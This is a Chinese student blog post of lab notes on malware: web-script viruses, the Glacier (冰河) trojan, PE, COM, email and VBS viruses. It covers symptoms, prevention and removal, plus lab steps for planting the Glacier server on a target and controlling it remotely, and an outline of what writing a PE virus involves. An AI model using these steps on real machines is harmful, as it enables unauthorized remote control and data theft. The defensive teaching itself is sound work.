<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  

  
  <title>脚本病毒攻击 | AMY&#39;s BLOG</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="脚本及恶意网页病毒1.脚本定义　　脚本（script）是使用一种特定的描述性语言，依据一定的格式编写的可执行文件，又称作宏或批处理文件。　　脚本是批处理文件的延伸，是一种纯文本保存的程序，一般来说的计算机脚本程序是确定的一系列控制计算机进行运算操作动作的组合，在其中可以实现一定的逻辑分支等。　　脚本简单地说就是一条条的文字命令，这些文字命令是可以看到的（如可以用记事本打开查看、编辑），脚本程序在执">
<meta property="og:type" content="article">
<meta property="og:title" content="脚本病毒攻击">
<meta property="og:url" content="https://amy-ccc098.github.io/2021/12/02/%E8%84%9A%E6%9C%AC%E7%97%85%E6%AF%92%E6%94%BB%E5%87%BB/%E8%84%9A%E6%9C%AC%E7%97%85%E6%AF%92%E6%94%BB%E5%87%BB/index.html">
<meta property="og:site_name" content="AMY&#39;s BLOG">
<meta property="og:description" content="脚本及恶意网页病毒1.脚本定义　　脚本（script）是使用一种特定的描述性语言，依据一定的格式编写的可执行文件，又称作宏或批处理文件。　　脚本是批处理文件的延伸，是一种纯文本保存的程序，一般来说的计算机脚本程序是确定的一系列控制计算机进行运算操作动作的组合，在其中可以实现一定的逻辑分支等。　　脚本简单地说就是一条条的文字命令，这些文字命令是可以看到的（如可以用记事本打开查看、编辑），脚本程序在执">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://raw.githubusercontent.com/Amy-CCC098/pic_store/master/image-20211201143343070.png">
<meta property="og:image" content="http://10.3.1.72/storage/upload/images/20170809114038598a8436d3141.png">
<meta property="article:published_time" content="2021-12-02T08:14:32.000Z">
<meta property="article:modified_time" content="2022-02-16T07:19:43.644Z">
<meta property="article:author" content="CAIMI">
<meta property="article:tag" content="safety">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://raw.githubusercontent.com/Amy-CCC098/pic_store/master/image-20211201143343070.png">
  
    <link rel="alternate" href="/atom.xml" title="AMY&#39;s BLOG" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 5.4.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">AMY&#39;s BLOG</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="搜索"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="https://Amy-CCC098.github.io"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-脚本病毒攻击/脚本病毒攻击" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2021/12/02/%E8%84%9A%E6%9C%AC%E7%97%85%E6%AF%92%E6%94%BB%E5%87%BB/%E8%84%9A%E6%9C%AC%E7%97%85%E6%AF%92%E6%94%BB%E5%87%BB/" class="article-date">
  <time datetime="2021-12-02T08:14:32.000Z" itemprop="datePublished">2021-12-02</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      脚本病毒攻击
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        
        
        <h2 id="脚本及恶意网页病毒"><a href="#脚本及恶意网页病毒" class="headerlink" title="脚本及恶意网页病毒"></a>脚本及恶意网页病毒</h2><p><strong>1.脚本定义</strong><br>　　脚本（script）是使用一种特定的描述性语言，依据一定的格式编写的可执行文件，又称作宏或批处理文件。<br>　　脚本是批处理文件的延伸，是一种纯文本保存的程序，一般来说的计算机脚本程序是确定的一系列控制计算机进行运算操作动作的组合，在其中可以实现一定的逻辑分支等。<br>　　脚本简单地说就是一条条的文字命令，这些文字命令是可以看到的（如可以用记事本打开查看、编辑），脚本程序在执行时，是由系统的一个解释器，将其一条条的翻译成机器可识别的指令，并按程序顺序执行。因为脚本在执行时多了一道翻译的过程，所以它比二进制程序执行效率要稍低一些。<br>　　脚本通常可以由应用程序临时调用并执行。各类脚本被广泛地应用于网页设计中，因为脚本不仅可以减小网页的规模和提高网页浏览速度，而且可以丰富网页的表现，如动画、声音等。举个最常见的例子，当点击网页上的Email地址时能自动调用Outlook Express或Foxmail这类邮箱软件，就是通过脚本功能来实现的。也正因为脚本的这些特点，往往被一些别有用心的人所利用。例如在脚本中加入一些破坏计算机系统的命令，这样当用户浏览网页时，一旦调用 这类脚本，便会使用户的系统受到攻击。所以用户应根据对所访问网页的信任程度选择安全等级，特别是对于那些本身内容就非法的网页，更不要轻易允许使用脚本。通过“安全设置”对话框，选择“脚本”选项下的各种设置就可以轻松实现对脚本的禁用和启用。</p>
<p><strong>2.网页病毒定义</strong><br>　　网页病毒是利用网页来进行破坏的病毒，它使用一些SCRIPT语言编写的一些恶意代码利用浏览器的漏洞来实现病毒植入。当用户登录某些含有网页病毒的网站时，网页病毒便被悄悄激活，这些病毒一旦激活，可以利用系统的一些资源进行破坏。轻则修改用户的注册表，使用户的首页、浏览器标题改变，重则可以关闭系统的很多功能，装上木马，染上病毒，使用户无法正常使用计算机系统，严重者则可以将用户的系统进行格式化。而这种网页病毒容易编写和修改，使用户防不胜防。</p>
<p><strong>3.网页病毒概述</strong><br>　　目前的网页病毒都是利用JS.ActiveX、WSH共同合作来实现对客户端计算机，进行本地的写操作，如改写你的注册表，在你的本地计算机硬盘上添加、删除、更改文件夹或文件等操作。而这一功能却恰恰使网页病毒、网页木马有了可乘之机。</p>
<p><strong>4.网页病毒的性质及特点</strong><br>　　网页病毒使得各种非法恶意程序能够得以被自动执行，在于它完全不受用户的控制。你一旦浏览含有病毒的网页，即可以在你不知不觉的情况下马上中招，给用户的系统带来一般性的、轻度性的、严重恶性等不同程度的破坏。令你苦不堪言，甚至损失惨重无法弥补。</p>
<p><strong>5.网页病毒的攻击方式</strong><br>　　既然是网页病毒，那么很简单的说，它就是一个网页，但在这个网页运行与本地时，它所执行的操作就不仅仅是下载后再读出，伴随着前者的操作背后，还有这病毒原体软件的下载，或是木马的下载，然后执行，悄悄地修改你的注册表，等等…那么，这类网页都有什么特征呢？<br>　　a）美丽的网页名称，以及利用浏览者的无知<br>　　b）利用浏览者的好奇心<br>　　c）无意识的浏览者<br>　　它主要是利用软件或系统操作平台等的安全漏洞，通过执行嵌入在网页HTML超文本标记语言内的Java Applet小应用程序，javascript脚本语言程序，ActiveX软件部件网络交互技术支持可自动执行的代码程序，以强行修改用户操作系统的注册表设置及系统实用配置程序，或非法控制系统资源盗取用户文件，或恶意删除硬盘文件、格式化硬盘为行为目标的非法恶意程序。</p>
<p><strong>6.网页病毒种类</strong><br>　　根据目前互联网上流行的常见网页病毒的作用对象及表现特征，归纳为以下两大种类：<br>　　　　第一类：通过Java Script、Applet、ActiveX编辑的脚本程序修改IE浏览器：<br>　　　　　a).默认主页被修改；<br>　　　　　b).默认首页被修改；<br>　　　　　c).默认的微软主页被修改；<br>　　　　　d).主页设置被屏蔽锁定，且设置选项无效不可改回；<br>　　　　　e).默认的IE搜索引擎被修改；<br>　　　　　f) IE标题栏被添加非法信息<br>　　　　　g).OE标题栏被添加非法信息；<br>　　　　　h).鼠标右键菜单被添加非法网站广告链接；<br>　　　　　i).鼠标右键弹出菜单功能被禁用失常；<br>　　　　　j). IE收藏夹被强行添加非法网站的地址链接；<br>　　　　　k).在IE工具栏非法添加按钮；<br>　　　　　l).锁定地址下拉菜单及其添加文字信息；<br>　　　　　m) IE菜单“查看”下的“源文件”被禁用；<br>　　　第二类：通过Java Script、Applet、ActiveX编辑的脚本程序修改用户操作系统：<br>　　　　　a).开机出现对话框；<br>　　　　　b).系统正常启动后，但IE被锁定网址自动调用打开；<br>　　　　　c).格式化硬盘<br>　　　　　d).暗藏“万花谷”蛤蟆病毒，全方位侵害封杀系统，最后导致瘫痪崩溃；<br>　　　　　e).非法读取或盗取用户文件；<br>　　　　　f).锁定禁用注册表；<br>　　　　　g).注册表被锁定禁用之后，编辑*.reg注册表文件打开方式错乱；<br>　　　　　h).时间前面加广告；<br>　　　　　i).启动后首页被再次修改；<br>　　　　　j).更改“我的电脑”下的一系列文件夹名称</p>
<p><strong>实验内容</strong></p>
<p>​    执行一主要在C盘根目录下创建test.htm文件的脚本文件。将文件脚本后缀改为htm，点击后会发现C盘根目录下创建了一个test.htm文件。对于其他作用的脚本文件也是修改后缀.txt为htm，网页打开，运行脚本。</p>
<hr>
<h2 id="木马攻击实验"><a href="#木马攻击实验" class="headerlink" title="木马攻击实验"></a>木马攻击实验</h2><p><strong>1.木马定义</strong><br>　　木马是隐藏在正常程序中的具有特殊功能恶意代码，是具备破坏，删除和修改文件，发送密码，记录键盘，实施Dos攻击甚至完全可能告知计算机等特殊功能的后门程序。它隐藏在目标计算机里，可以随计算机自动启动并在某一端口监听来自控制端的控制信息。</p>
<p><strong>2.木马工作原理</strong><br>　　（1）木马的传统连接技术：一般木马都采用C/S(client/server,即服务器/客户端)运行模式，因此它分为两部分，即客户端和服务前端木马程序。其原理是，当服务器端程序在目标计算机上被执行后，一般会打开一个默认的端口进行监听，当客户端向服务器端主动提出连接请求，服务器端的木马程序就会自动运行，来应答客户端的请求，从而建立连接。第一代和第二代木马就采用这种方式。<br>　　（2）木马的反弹端口技术：随着防火墙技术的发展，它可有效拦截从外部主动发起的连接的木马程序。但防火墙对内部发起的连接请求则认为是正常连接，第三代第四代木马就是利用这个缺点，其服务器端程序主动发起对外连接请求，再通过某些方式连接到木马的客户端，就是说“反弹式”木马是服务器端主动发起连接请求，而客户端是被动的连接。<br>　　（3）线程插入技术：我们知道，一个应用程序在运行之后，都会在系统之中产生一个进程，同时，每个进程分别对应了一个不同的进程标识符。系统会分配一个虚拟的内存空间地址段给这个进程，一切相关的程序操作，都会在这个虚拟的空间中进行。一般情况下，线程之间是相互独立的，当一个线程发生错误的时候，并不一定会导致整个进程的崩溃。“线程插入”技术就是利用线程之间运行的相对独立性，使木马完全地融进了系统那个内核。系统运行时会有很多的进程，而每个进程又有许多的线程，这就导致了查杀利用“线程插入”技术木马程序的难度。</p>
<p><strong>3.木马的特征</strong><br>　　木马不经电脑用户准许就可获得电脑的使用权。程序容量十分轻小，运行时不会浪费太多资源，因此没有使用杀毒软件是难以发觉的，运行时很难阻止它的行动，运行后，立刻自动登录在系统引导区，之后每次在Windows加载时自动运行，或立刻自动变更文件名，甚至隐形，或马上自动复制到其他文件夹中，运行连用户本身都无法运行的动作。</p>
<p><strong>4.木马的危害</strong><br>　　a）、盗取我们的网游账号，威胁我们的虚拟财产的安全<br>　　木马病毒会盗取我们的网游账号，它会盗取我们帐号后，并立即将帐号中的游戏装备转移，再由木马病毒使用者出售这些盗取的游戏装备和游戏币而获利。<br>　　b）、盗取我们的网银信息，威胁我们的真实财产的安全<br>　　木马采用键盘记录等方式盗取我们的网银帐号和密码，并发送给黑客，直接导致我们的经济损失。<br>　　c）、利用即时通讯软件盗取我们的身份，传播木马病毒等不良信息<br>　　中了此类木马病毒后，可能导致我们的经济损失。在中了木马后电脑会下载病毒作者指定的程序任意程序，具有不确定的危害性。如恶作剧等。<br>　　d）、给我们的电脑打开后门，使我们的电脑可能被黑客控制<br>　　如灰鸽子木马等。当我们中了此类木马后，我们的电脑就可能沦为肉鸡，成为黑客手中的工具</p>
<p><strong>5.木马病毒的防御</strong><br>　　木马查杀(查杀软件很多，有些病毒软件都能杀木马)<br>　　防火墙(分硬件和软件)家里面的就用软件好了，如果是公司或其他地方就硬件和软件一起用。<br>　　基本能防御大部分木马，但是的软件都不是万能的，还要学点专业知识，有了这些，你的电脑就安全多了。高手也很多，只要你不随便访问来历不明的网站，使用来历不明的软件(很多盗版或破解软件都带木马，这个看你自己经验去区分)，还要及时更新系统漏洞，如果你都做到了，木马，病毒。就不容易进入你的电脑了。</p>
<p><strong>实验步骤</strong></p>
<img src="https://raw.githubusercontent.com/Amy-CCC098/pic_store/master/image-20211201143343070.png" alt="image-20211201143343070" style="zoom:50%;">

<p>冰河木马控制端和服务端程序。</p>
<p>冰河病毒控制目标机：</p>
<ol>
<li>将包含控制、服务程序的冰河文件夹共享给新添加用户everyone，权限为读/写。</li>
<li>目标机上开始-运行，输入操作机ip，打开操作机共享的文件夹，将服务端程序复制到目标机桌面，双击运行。</li>
<li>回到操作机，打开冰河控制端，点击菜单栏“添加主机”按钮，添加目标机的ip地址，口令可以为空，监听端口为7626。然后确定。</li>
<li>单击新建的主机，连接成功就可以像操作自己的电脑一样操作远程目标电脑。还可以点击命令控制台，对系统进行操作。</li>
</ol>
<p>清除冰河病毒：</p>
<p>操作机清除：</p>
<p>​    点击“控制类命令”前面的“+”，点击“系统控制”可看到“自动卸载冰河”按钮并点击，在弹出的窗口里面点击“是”，则可以卸载远程主机上的木马。</p>
<p>目标机手动清除：</p>
<ol>
<li><p>在“开始”的“运行”里面输入regedit，打开Windows注册表编辑器。</p>
</li>
<li><p>依次打开子键目录</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</span><br><span class="line"># 这个目录是个管理加载启动项的地方，也就是电脑开启后程序自动会启动的地方。</span><br></pre></td></tr></table></figure></li>
<li><p>在目录中发现了一个默认的键值C:\WINNT\System32\kernel32.exe，这就是“冰河”密码在注册表中加入的键值，选中它，右键，点击删除，即可把它删除。</p>
</li>
<li><p>然后再打开子键目录HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runservices，同样存在着一个默认的键值C:\WINNT\System32\kernel32.exe，选中它，右键，点击删除。</p>
</li>
<li><p>然后再进入C:\WINDOWS\System32目录，找到“冰河”木马的可执行文件KERNEL32.exe文件，将它删除。</p>
</li>
<li><p>接着，找到注册表的HKEY_CLASSES_ROOT\txtfile\Shell\open\command下的默认值，选中“（默认）”，右键——修改，将数值数据C:\Windows\System32\Sysexplr.exe %1改为正常情况下的C:\Windows\notepad.exe %1即可。</p>
<p>（这里是由于木马可能会修改文件关联，“冰河”木马将txt文件的缺省打开方式由notepad.exe改为木马的启动程序，除此之外，html,exe,zip,com等也都是木马的目标，所以，在最后需要恢复注册表中的txt文件关联功能。）</p>
</li>
<li><p>最后，重新启动计算机，冰河木马就彻底删除了。</p>
</li>
</ol>
<hr>
<h2 id="PE病毒"><a href="#PE病毒" class="headerlink" title="PE病毒"></a>PE病毒</h2><p><strong>1.PE病毒定义</strong><br>　　PE病毒，又称Win32 PE病毒，或简称Win32病毒。它指所有感染Windows下PE文件格式文件的病毒。因为它通常采用Win32汇编编写，而且格式为PE，因此得名。真正的病毒技术在PE病毒中才会得到真正的体现（令病毒极度疯狂的DOS时代已经过去），所以对于一个黑客、骇客或者是热衷于病毒技术的程序员，是非常有必要进行学习PE病毒的编写的。</p>
<p><strong>2.PE病毒概述</strong><br>　　PE病毒的优点是在任何的Windows系统环境下都能都运行，缺点是它使用汇编语言编写，而且需要做复杂的文件格式处理，对编程的技术要求很高。<br>　　PE的意思是可移植的执行体，即portable executable，是windows下的一个32位的文件格式，保留了MZ文件头以便于运行于DOS，在windows中广泛存在这种格式。PE格式是病毒喜欢感染的类型，可以在安全模式下删除，危害和一般病毒是一样的。只不过病毒通过修改可执行文件的代码中程序入口地址，变成病毒的程序入口，导致运行的时候执行病毒文件，这是比较常用的方式，删除就没事了。</p>
<p><strong>3.编写PE病毒的几个关键</strong><br>　　a).病毒的重定位。<br>　　b).获取API函数地址。<br>　　c).文件搜索。<br>　　d).内存映射文件。<br>　　e).病毒如何感染其他文件。<br>　　f).病毒如何返回到Host程序。</p>
<p><strong>4.PE病毒破坏方法</strong><br>　　此病毒启动后会将自己拷贝到系统目录下并且在后台隐藏运行<br>　　此病毒将自己注册成为服务进程在后台隐藏运行，尝试连接网络，如果网络连接失败的话，此病毒还会尝试利用拨号连接网络，此病毒网络连接成功后会向指定的地址利用HTTP的方式下载文件到本地，并且还会拦截用户的操作，窃取指定软件的安全信息并保存在指定的文件中，然后利用FTP的方式将文件上传到指定的地址中。</p>
<p><strong>5.PE病毒查杀预防方法</strong><br>　　a）、建议重启电脑进入安全模式，然后在拔掉网线的情况下全盘杀毒。<br>　　b）、通过WINDOWS UPDATE升级关键安全更新补丁，关闭不安全的共享以及使用复杂组合的登录密码能有效的防止这类蠕虫的再次感染。使用网络防火墙也可以达到一定程度的预防。</p>
<p><strong>实验内容</strong></p>
<p>查看文件是否被感染：使用visual C++和winpe可以查看文件是否被感染，将winpe.dsw用vc++打开，点击build和execute program,会打开winpe程序，在里面打开其他文件，若出现乱码则为被感染，反之，则未被感染。</p>
<hr>
<h2 id="COM病毒"><a href="#COM病毒" class="headerlink" title="COM病毒"></a>COM病毒</h2><p><strong>1.COM病毒原理</strong><br>　　COM病毒感染一般有两种途径，一种是将自身代码附加到宿主程序之前，病毒执行完后恢复寄生程序原先的状态，并用JMP FAR等指令使程序再次回到CS:100H处，以确保寄生程序与PSP的一致。但更为常见的病毒为采用保存文件头若干字节，并将第一条指令改为“JMP 病毒入口”，以确保病毒最先执行。病毒执行完后，会恢复并运行原文件，以便传播，当其将原文件参数全部恢复后，会将控制权交于CS:100H处。</p>
<p><strong>2.COM文件的特点</strong><br>　　COM文件是DOS的一种二进制代码的可执行文件，COM文件结构比较简单，加载过程十分迅速。整个程序只有一个段。因此全部代码长度必须小于64K，其入口代码地址是CS:100H。 DOS装入COM文件时，先在内存建立一个长度为100H的程序前缀段(PSP，由DOS建立，是DOS用户程序和命令行之间的接口)，然后将整个文件装载于PSP上端，不进行重定位操作，接着将四个段地址寄存器DS(Data Segment)，CS(Code Segment)，SS(Stack Segment)，ES(Extra Segment)初始化为程序前缀段(PSP)的段地址，最后将程序的控制权交于CS:100H处。如表1所示：</p>
<img src="http://10.3.1.72/storage/upload/images/20170809114038598a8436d3141.png" alt="img" style="zoom:67%;">

<p><strong>实验内容</strong></p>
<ol>
<li>下载MASM，将txt中代码保存为test.asm,virus.asm文件，通过MASM运行生成可执行文件。将.asm,.exe等文件放入一个文件夹，让文件夹共享。</li>
<li>然后进入目标机点击开始-运行，输入操作机ip,将文件夹复制到目标及桌面。</li>
<li>运行，virus.exe文件，无异常</li>
<li>将test.asm后缀改为.com，再运行virus.exe文件，文件被感染。</li>
</ol>
<hr>
<h2 id="邮件病毒"><a href="#邮件病毒" class="headerlink" title="邮件病毒"></a>邮件病毒</h2><p><strong>1.邮件病毒定义</strong><br>　　“邮件病毒”其实和普通的电脑病毒一样，只不过由于它们的传播途径主要是通过电子邮件，所以才被称为“邮件病毒”。<br>　　邮件病毒的危害十分巨大，邮件病毒如果处理不好的话会对用户的计算机系统甚至是工作都会产生极大的危害。邮件病毒的形式最主要的是附件病毒，只要用户点击了附件或是点开信件病毒就会发作。</p>
<p><strong>2.邮件病毒概述</strong><br>　　“邮件病毒”其实和普通的电脑病毒一样，只不过由于它们的传播途径主要是通过电子邮件，所以才被称为“邮件病毒”。“邮件病毒”主要是为了让用户的计算机感染病毒，或者是成为黑客手中的肉鸡。<br>　　这些邮件一般都会使用社会工程学，在计算机中，什么是社会工程学，就是一封信发信人自称是某某公司、银行、证券、以及一些知名或不知名的服务商的管理员，说你在某某地方注册了什么帐户，现在需要安装一个插件，或者使用软件，或者一个什么软件的。或者直接告诉你安装过程请看附件。总之就是一种以高级用户的身份欺骗刚刚入行，或者刚刚注册过什么帐户的人。这就是社会工程学，与常见的钓鱼网站有异曲同工。这样，防范的措施有以下几条。<br>　　a） 在收到信的时候，不管是不是认识的还是不认识的，附件一定先不要打开，虽然有些E-mail在上传附件的时候都进行了杀毒，不怕一万就怕万一。除非，你和他正在研究邮件病毒，或者在制造邮件病毒。<br>　　b）看见带有附件的邮件，可以把附件下下来，然后用杀毒软件杀毒，如果还是怕中毒，你可以这样做。<br>　　①打开我的电脑，在工具栏中找到工具选择文件夹选项，在弹出的对话框中选择查看这个选项，把“隐藏已知文件类型的扩展”前面的勾去掉。<br>　　②在邮件的附件上右击 选择另存为， 在要你重命名的时候在文件名的后面打上“*.txt” 然后再杀毒。<br>　　③如果还是不放心，你可以选择删除。<br>　　c）记住自己常用的一些注册网站的管理员邮箱，或者记住他们的邮箱后缀。在看见这些邮件的时候一点要仔细核对这些信息，使用社会工程学的人一定会伪造一个极像的或者一字之差的邮箱与你沟通。例如，前一段时间有一个病毒文件的计算机进程，如下： rundll32.exe（真实的）rund1l32.exe（病毒）rund1132.exe（病毒）,你不认真看，一下还真有点看不出来。这样的邮件不管三七二十一，统统不要。<br>　　d） 为了您能安全上网，安全的发邮件，有时候在QQ，MSN，SKY里面别人给你的莫名的网站一定不要打开，除非你特别信任他，或者你已经知道了结果是什么。</p>
<p><strong>3.邮件病毒的特点</strong><br>　　a）、感染速度快<br>　　在单机环境下，病毒只能通过U盘或光盘等介质，从一台计算机传染到另一台，而在网络中、则可以通过诸如电子邮件这样的网络通讯机制进行迅速扩散。根据测定，针对一台典型的PC网络在正常使用情况，只要有一台工作站有病毒，就可在几十分钟内将网上的数百台计算机全部感染。<br>　　b）、扩散面广<br>　　由于电子邮件不仅仅在单个企业内部传播，这直接致使“邮件病毒”的扩散不仅快，而且扩散范围很大，不但能迅速传染局域网内所有计算机，还能通过将病毒在一瞬间传播到千里之外。<br>　　c）、清除病毒困难<br>　　单机上的计算机病毒有时可通过删除带毒文件，格式化硬盘等措施将病毒彻底清除。而企业中的计算机一旦感染了病毒，清除病毒变得非常困难，刚刚完成清除工作的计算机就有可能被网络中另一台带毒工作站所感染，使得邮件病毒变得非常困难了。<br>　　d）、破坏性大<br>　　网络中的计算机感染了邮件病毒之后，将直接影响网络的工作，轻则降低速度，影响工作效率，重则使网络及计算机崩溃，资料丢失。<br>　　e）、隐蔽性<br>　　邮件病毒与其他病毒相比，更隐蔽。一般来说，邮件病毒通常是隐蔽在邮件的附件中，或者是邮件的信纸中，这一定程度上会加速病毒的泛滥，也增加了查杀病毒的难度。</p>
<p><strong>4.邮件病毒的预防</strong><br>　　邮件病毒其实和普通的电脑病毒一样，只不过由于它们的传播途径主要是通过电子邮件，所以才被称为邮件病毒。它们一般是通过在邮件中附件夹带的方法进行扩散的，你运行了该附件中的病毒程序，才能够使你的电脑染毒。知道了这一点，我们就不难采取相应的措施进行防范了。<br>　　病毒是夹带在邮件中的，邮件是“死”的，其中的病毒也不会主动变活的。一般可能是一个带病毒的附件，你不去运行它，它当然不会侵染你的系统。不要轻易打开陌生人来信中的附件文件。当你收到陌生人寄来的一些自称是不可不看的有趣邮件时，千万不要不假思索地打开它。尤其对于一些“.exe”之类的可执行文件，就更要谨慎。<br>　　对于比较熟悉的朋友寄来的信件，如果其邮件中夹带了附件，但是他却没有在邮件中提及或是说明，也不要轻易运行。因为有些病毒是偷偷地附着上去的—也许他的电脑已经染毒，可他自己却不知道。比如“Happy 99”就是这样的病毒。<br>　　给别人发送程序文件甚至包括电子贺卡时，一定要先确认没有问题后再发，以免成为病毒的传播者。另外，应该切忌盲目转发：有的朋友当收到某些自认为有趣的邮件时，还来不及细看就打开通讯簿给自己的每一位朋友都转发一份，这极有可能使病毒的制造者恶行得逞，而你的朋友对你发来的信无疑是不会产生怀疑的，结果你无意中成为病毒的传播者。<br>　　一般邮件病毒的传播是通过附件进行的。如Happy 99、Mellissa（美丽杀手）等。你用FoxMail收到的邮件中会看到带病毒的附件，如名为“Happy 99.exe”的文件，不用担心，不要运行它，直接删掉就可以了。有些是潜伏在Word文件中的宏病毒，因此对Word文件形式的附件，也要小心。<br>　　另一种病毒是利用ActiveX来传播的。由于一些E-mail软件如Outlook等可以发送HTML格式的邮件，而HTML文件可包含ActiveX控件，而ActiveX在某些情况下又可以拥有对你的硬盘的读写权，因此带有病毒的HTML格式的邮件，可以在你浏览邮件内容时被激活，但这种情况仅限于HTML格式的邮件 。<br>通过以上五个步骤，大部分的邮件病毒都被拒之门外了，你也可以安安心心的接收邮件了。</p>
<p><strong>5.邮件病毒的应对方法</strong><br>　　经常利用网络收发邮件的人，最苦恼的事莫过于邮箱中毒和利用邮件让机子感染病毒。碰到以上的情况也不用惊慌失措，下面就教你清除入侵的病毒邮件的办法。<br>　　a)断开网络<br>　　当你不幸遭遇病毒入侵之后，当机立断的一件事就是断开你的网络连接，以避免病毒的进一步扩散。<br>　　b)文件备份<br>　　然后就是删除带毒的邮件，再运行杀毒软件进行清除，但为了防止杀毒软件误杀或是删除你还没有处理完的文档和重要的邮件，你应该首先将它们转移备份到其他储存媒体上。<br>　　有些长文件名的文件和未处理的邮件要求在Windows下备份，所以建议你先不要退出Windows，因为病毒一旦发作，也许就不能进入Windows了。不管这些文件是否带毒了，你都应该备份，因为有些病毒是专门针对某个杀毒软件设计的，一运行就会破坏其他的文件，所以先备份是以防万一的措施。等你清除完硬盘内的病毒后，再来慢慢分析处理这些额外备份的文件较为妥善。另外对你的重要文件也要做备份，最好是备份到其他移动存储设备上，如USB盘、移动硬盘、刻录盘等，尽量不要使用本地硬盘，以确保数据的安全。<br>　　如果在平时作了GHOST备份，利用映像文件来恢复系统，这样连潜在的木马程序也清除了，当然，这要求你的GHOST备份是没有病毒。<br>　　c)借助杀毒软件<br>　　做好前面的准备工作后，这时就应该关闭计算机后再启动机器，然后用一张干净的DOS启动盘来引导系统。另外，由于中毒后，Windows已经被破坏了部分关键文件，会频繁地非法操作，所以Windows下的杀毒软件可能会无法运行，所以应该准备一个DOS下的杀毒软件以防万一。<br>　　即使能在Windows下运行杀毒软件的，也尽量用两种以上的工具软件来交叉清理。在多数情况下Windows可能要重装，因为病毒会破坏掉一部分文件让系统变慢或出现频繁的非法操作。由于杀毒软件在开发时侧重点不同、使用的杀毒引擎不同，各种杀毒软件都有自己的长处和短处，交叉使用效果较理想。<br>　　现在流行的杀毒软件在技术上都有所提高，并能及时更新病毒库，因此一般情况下你所碰到的病毒是应该在杀毒软件的围剿范围内的。<br>　　d)安全处理<br>　　包括登录网络的用户名、密码、邮箱和QQ密码等，防止黑客已经在上次入侵过程中知道了你的密码。另外因为很多蠕虫病毒发作后会向外随机发送你的信息，所以适当地更改是必要的。</p>
<hr>
<h2 id="VBS病毒"><a href="#VBS病毒" class="headerlink" title="VBS病毒"></a>VBS病毒</h2><p><strong>1.VBS脚本病毒定义</strong><br>　　VBS脚本病毒是使用VBScript编写。以宏病毒和新欢乐时光病毒为典型代表的VBS脚本病毒十分的猖獗，很重要的一个原因就是其编写简单。使用VBScript编写。</p>
<p><strong>2.VBS脚本病毒简介</strong><br>　　网络的流行，让我们的世界变得更加美好，但它也有让人不愉快的时候。当您收到一封主题为“I Love You”的邮件，用兴奋得几乎快发抖的鼠标去点击附件的时候；当您浏览一个信任的网站之后，发现打开每个文件夹的速度非常慢的时候，您是否察觉病毒已经闯进了您的世界呢？2000年5月4日欧美爆发的“宏病毒”网络蠕虫病毒。由于通过电子邮件系统传播，宏病毒在短短几天内狂袭全球数百万计的电脑。微软、Intel等在内的众多大型企业网络系统瘫痪，全球经济损失达几十亿美元。而2002上半年爆发的新欢乐时光病毒至今都让广大电脑用户更是苦不堪言。<br>　　上面提及的两个病毒最大的一个共同特点是：使用VBScript编写。</p>
<p><strong>3.VBS脚本病毒如何感染、搜索文件</strong><br>　　VBS脚本病毒一般是直接通过自我复制来感染文件的，病毒中的绝大部分代码都可以直接附加在其他同类程序的中间，譬如新欢乐时光病毒可以将自己的代码附加在.htm文件的尾部，并在顶部加入一条调用病毒代码的语句，而宏病毒则是直接生成一个文件的副本，将病毒代码拷入其中，并以原文件名作为病毒文件名的前缀，vbs作为后缀。</p>
<p><strong>4.VBS脚本病毒通过网络传播的几种方式及代码分析</strong><br>　　VBS脚本病毒之所以传播范围广，主要依赖于它的网络传播功能，一般来说，VBS脚本病毒采用如下几种方式进行传播：<br>　　a）通过Email附件传播<br>　　这是一种用的非常普遍的传播方式，病毒可以通过各种方法拿到合法的Email地址，最常见的就是直接取outlook地址簿中的邮件地址，也可以通过程序在用户文档（譬如htm文件）中搜索Email地址。<br>　　b）通过局域网共享传播<br>　　局域网共享传播也是一种非常普遍并且有效的网络传播方式。一般来说，为了局域网内交流方便，一定存在不少共享目录，并且具有可写权限，譬如win2000创建共享时，默认就是具有可写权限。这样病毒通过搜索这些共享目录，就可以将病毒代码传播到这些目录之中。<br>　　c）通过感染htm、asp、jsp、php等网页文件传播<br>　　如今，WWW服务已经变得非常普遍，病毒通过感染htm等文件，势必会导致所有访问过该网页的用户机器感染病毒。<br>　　d）通过IRC聊天通道传播</p>
